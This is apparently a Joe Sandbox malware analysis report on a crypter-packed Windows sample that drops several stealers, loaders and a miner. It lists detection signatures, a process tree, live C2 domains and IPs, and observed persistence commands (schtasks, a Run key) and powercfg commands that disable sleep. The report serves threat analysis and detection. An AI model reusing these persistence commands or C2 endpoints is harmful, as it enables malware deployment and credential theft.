Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Analysis ID:1514956
MD5:96cb7df578398d5d46dd4daeffbdc41f
SHA1:7b7ecf7d006c2e2cd2b237dde3402f6b78e6c54b
SHA256:e301b79d4279d52c49c886fcd0ab8acc3941c5cf28c7dd0eb57e8af81fe476fb
Tags:exe
Infos:

Detection

Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected Cryptbot
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PrivateLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Socks5Systemz
Yara detected Vidar
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops large PE files
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe" MD5: 96CB7DF578398D5D46DD4DAEFFBDC41F)
    • RegAsm.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • j6V5568MqaTghErAlfE30BBB.exe (PID: 7888 cmdline: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe MD5: 1FEDF314D7C5ED06FF6833C9C8FE5441)
        • WerFault.exe (PID: 2764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • JxvL46JFox50ORU3tEsaxZ2Y.exe (PID: 7896 cmdline: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe MD5: D399F8ABCA97B04F273F04322E4378BE)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 1136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • kvOccCLzMNloI4W4GuGOaRuh.exe (PID: 7924 cmdline: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe MD5: 0A02550E0EA5490D4D80EE79661C99E1)
        • kvOccCLzMNloI4W4GuGOaRuh.tmp (PID: 5444 cmdline: "C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe" MD5: 010CD22508FA12015E83A39FEB2DB9AA)
          • videocompressor32.exe (PID: 2036 cmdline: "C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i MD5: 8C1835DABEA53E9D98E866C950CD260D)
      • v7u3knm8W6_1U6jDWPH31qsx.exe (PID: 7932 cmdline: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe MD5: 8FB3610C4BA81A5A93666562E712740A)
      • Zt2eeOHcoNwxYT3C9R8h67os.exe (PID: 7940 cmdline: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
        • Zt2eeOHcoNwxYT3C9R8h67os.exe (PID: 3124 cmdline: "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe" MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
          • schtasks.exe (PID: 3856 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LeVSNPB9FLpXmtLG7mcICpEf.exe (PID: 7948 cmdline: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe MD5: A463E516041F4BC84F03BC8FE2B643DD)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 7136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • pZhQ7nTCR9R3A5r5QIQYLapT.exe (PID: 7956 cmdline: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe MD5: 2F59FBD6623872FBDC2F63D18023BFDA)
        • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • RK8ajtyf9pvKlaXEo3EjTbnu.exe (PID: 7964 cmdline: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe MD5: E8E6CD9EC48FAFCCC174F7BF07D045E2)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • kCxbYlQ2A6NZXLbKZjtnUx3R.exe (PID: 7972 cmdline: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe MD5: D687AF3B103399AA245807BB719878B7)
        • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 2700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • h687rYoqxN2Ss_wvNXD9qqhf.exe (PID: 7984 cmdline: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe MD5: 098E15E88E5332253356C78BADF8D479)
      • u7IEXZpDnp1f9d_IZKWnjEtv.exe (PID: 7992 cmdline: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe MD5: D60D266E8FBDBD7794653ECF2ABA26ED)
        • powercfg.exe (PID: 4580 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4700 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4904 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • jsh_U9TvBUPPM2QGPo3kny24.exe (PID: 8000 cmdline: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe MD5: CB3952F1852179348F8D2DB91760D03B)
  • svchost.exe (PID: 1432 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2156 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1944 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • jewkkwnf.exe (PID: 4944 cmdline: C:\ProgramData\jewkkwnf\jewkkwnf.exe MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
{"C2 url": ["opponnentduei.shop", "chickerkuso.shop", "sentistivowmi.shop", "metallygaricwo.shop", "quotamkdsdqo.shop", "achievenmtynwjq.shop", "milldymarskwom.shop", "carrtychaintnyw.shop", "puredoffustow.shop"], "Build id": "a8kafm--@cloudcosmic"}
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "3a15237aa92dcd8ccca447211fb5fc2a"}
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
{"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}
{"C2 list": ["f20pt.top", "analforeverlovyu.top", "tventyvf20pt.top", "+tventyvf20pt.top", "pt.top", "@tventyvf20pt.top", "tyvf20pt.top"]}
{"C2 url": "193.233.255.84:4284", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      sslproxydump.pcapJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
            SourceRuleDescriptionAuthorStrings
            00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
              • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
              0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 35 entries
                    SourceRuleDescriptionAuthorStrings
                    29.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          23.2.RegAsm.exe.400000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            23.2.RegAsm.exe.400000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              Click to see the 22 entries

                              Change of critical system settings

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe, ParentImage: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe, ParentProcessId: 7992, ParentProcessName: u7IEXZpDnp1f9d_IZKWnjEtv.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 4580, ProcessName: powercfg.exe

                              System Summary

                              barindex
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe, ProcessId: 7984, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dell
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe, ProcessId: 3124, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1432, ProcessName: svchost.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:04.004318+020020362892Crypto Currency Mining Activity Detected192.168.2.9574721.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:45.473784+020020287653Unknown Traffic192.168.2.949743116.203.165.127443TCP
                              2024-09-21T14:48:47.475216+020020287653Unknown Traffic192.168.2.949746116.203.165.127443TCP
                              2024-09-21T14:48:49.155853+020020287653Unknown Traffic192.168.2.949747116.203.165.127443TCP
                              2024-09-21T14:48:51.096686+020020287653Unknown Traffic192.168.2.949751116.203.165.127443TCP
                              2024-09-21T14:48:52.638117+020020287653Unknown Traffic192.168.2.949753116.203.165.127443TCP
                              2024-09-21T14:48:55.858794+020020287653Unknown Traffic192.168.2.949754116.203.165.127443TCP
                              2024-09-21T14:48:56.625756+020020287653Unknown Traffic192.168.2.949756116.203.165.127443TCP
                              2024-09-21T14:49:00.380021+020020287653Unknown Traffic192.168.2.949757116.203.165.127443TCP
                              2024-09-21T14:49:01.262485+020020287653Unknown Traffic192.168.2.949758116.203.165.127443TCP
                              2024-09-21T14:49:02.729114+020020287653Unknown Traffic192.168.2.949760116.203.165.127443TCP
                              2024-09-21T14:49:03.446407+020020287653Unknown Traffic192.168.2.949761116.203.165.127443TCP
                              2024-09-21T14:49:05.708059+020020287653Unknown Traffic192.168.2.949763116.203.165.127443TCP
                              2024-09-21T14:49:07.620133+020020287653Unknown Traffic192.168.2.949765116.203.165.127443TCP
                              2024-09-21T14:49:09.447293+020020287653Unknown Traffic192.168.2.949766116.203.165.127443TCP
                              2024-09-21T14:49:10.895143+020020287653Unknown Traffic192.168.2.949767116.203.165.127443TCP
                              2024-09-21T14:49:12.300715+020020287653Unknown Traffic192.168.2.949768116.203.165.127443TCP
                              2024-09-21T14:49:16.052524+020020287653Unknown Traffic192.168.2.949769116.203.165.127443TCP
                              2024-09-21T14:49:18.007186+020020287653Unknown Traffic192.168.2.949770116.203.165.127443TCP
                              2024-09-21T14:49:19.877574+020020287653Unknown Traffic192.168.2.949771116.203.165.127443TCP
                              2024-09-21T14:49:22.732950+020020287653Unknown Traffic192.168.2.949773116.203.165.127443TCP
                              2024-09-21T14:49:25.544839+020020287653Unknown Traffic192.168.2.949774116.203.165.127443TCP
                              2024-09-21T14:49:27.944033+020020287653Unknown Traffic192.168.2.949775116.203.165.127443TCP
                              2024-09-21T14:49:33.488490+020020287653Unknown Traffic192.168.2.949777116.203.165.127443TCP
                              2024-09-21T14:49:36.410251+020020287653Unknown Traffic192.168.2.949780116.203.165.127443TCP
                              2024-09-21T14:49:45.941056+020020287653Unknown Traffic192.168.2.949792116.203.165.127443TCP
                              2024-09-21T14:49:48.219452+020020287653Unknown Traffic192.168.2.949796116.203.165.127443TCP
                              2024-09-21T14:49:49.778702+020020287653Unknown Traffic192.168.2.949799116.203.165.127443TCP
                              2024-09-21T14:49:51.535711+020020287653Unknown Traffic192.168.2.949801116.203.165.127443TCP
                              2024-09-21T14:49:54.578245+020020287653Unknown Traffic192.168.2.949805116.203.165.127443TCP
                              2024-09-21T14:49:59.573216+020020287653Unknown Traffic192.168.2.949812116.203.165.127443TCP
                              2024-09-21T14:50:00.211972+020020287653Unknown Traffic192.168.2.949813116.203.165.127443TCP
                              2024-09-21T14:50:04.284447+020020287653Unknown Traffic192.168.2.949818116.203.165.127443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:35.003496+020020546531A Network Trojan was detected192.168.2.949779172.67.173.81443TCP
                              2024-09-21T14:49:38.407829+020020546531A Network Trojan was detected192.168.2.949781104.21.85.92443TCP
                              2024-09-21T14:49:42.075690+020020546531A Network Trojan was detected192.168.2.949787172.67.173.81443TCP
                              2024-09-21T14:49:46.357534+020020546531A Network Trojan was detected192.168.2.949794104.21.85.92443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:35.003496+020020498361A Network Trojan was detected192.168.2.949779172.67.173.81443TCP
                              2024-09-21T14:49:38.407829+020020498361A Network Trojan was detected192.168.2.949781104.21.85.92443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:42.075690+020020498121A Network Trojan was detected192.168.2.949787172.67.173.81443TCP
                              2024-09-21T14:49:46.357534+020020498121A Network Trojan was detected192.168.2.949794104.21.85.92443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:34.728572+020020560091Domain Observed Used for C2 Detected192.168.2.949779172.67.173.81443TCP
                              2024-09-21T14:49:41.220148+020020560091Domain Observed Used for C2 Detected192.168.2.949787172.67.173.81443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:37.607786+020020560231Domain Observed Used for C2 Detected192.168.2.949781104.21.85.92443TCP
                              2024-09-21T14:49:45.908027+020020560231Domain Observed Used for C2 Detected192.168.2.949794104.21.85.92443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:46.745662+020020432341A Network Trojan was detected193.233.255.844284192.168.2.949745TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:46.523820+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:51.939916+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:55.664418+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:55.897035+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:56.226962+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:56.232234+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:57.753719+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:57.979757+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:48:58.314046+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:05.162152+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:05.548457+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:17.473958+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:18.347277+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:22.279030+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:22.571458+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:22.795755+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:23.027049+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:23.250649+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:23.481145+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:23.722893+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:32.809731+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:50.728631+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:50.951644+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:51.173742+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              2024-09-21T14:49:51.490264+020020432311A Network Trojan was detected192.168.2.949745193.233.255.844284TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:55.669580+020020460561A Network Trojan was detected193.233.255.844284192.168.2.949745TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:08.851174+020020185811A Network Trojan was detected192.168.2.949712103.130.147.21180TCP
                              2024-09-21T14:48:09.021938+020020185811A Network Trojan was detected192.168.2.949712103.130.147.21180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:50:17.802828+020020391031A Network Trojan was detected192.168.2.94982962.150.232.5080TCP
                              2024-09-21T14:50:19.044784+020020391031A Network Trojan was detected192.168.2.94983062.150.232.5080TCP
                              2024-09-21T14:50:20.423036+020020391031A Network Trojan was detected192.168.2.94983162.150.232.5080TCP
                              2024-09-21T14:50:21.651440+020020391031A Network Trojan was detected192.168.2.94983362.150.232.5080TCP
                              2024-09-21T14:50:22.851621+020020391031A Network Trojan was detected192.168.2.94983562.150.232.5080TCP
                              2024-09-21T14:50:24.030669+020020391031A Network Trojan was detected192.168.2.94983862.150.232.5080TCP
                              2024-09-21T14:50:25.382494+020020391031A Network Trojan was detected192.168.2.94984062.150.232.5080TCP
                              2024-09-21T14:50:26.600892+020020391031A Network Trojan was detected192.168.2.94984362.150.232.5080TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:49:39.736965+020020544951A Network Trojan was detected192.168.2.94978445.132.206.25180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-09-21T14:48:41.408032+020020543501A Network Trojan was detected192.168.2.9497395.53.124.19580TCP
                              2024-09-21T14:48:55.457255+020020543501A Network Trojan was detected192.168.2.9497555.53.124.19580TCP
                              2024-09-21T14:49:07.617661+020020543501A Network Trojan was detected192.168.2.9497645.53.124.19580TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
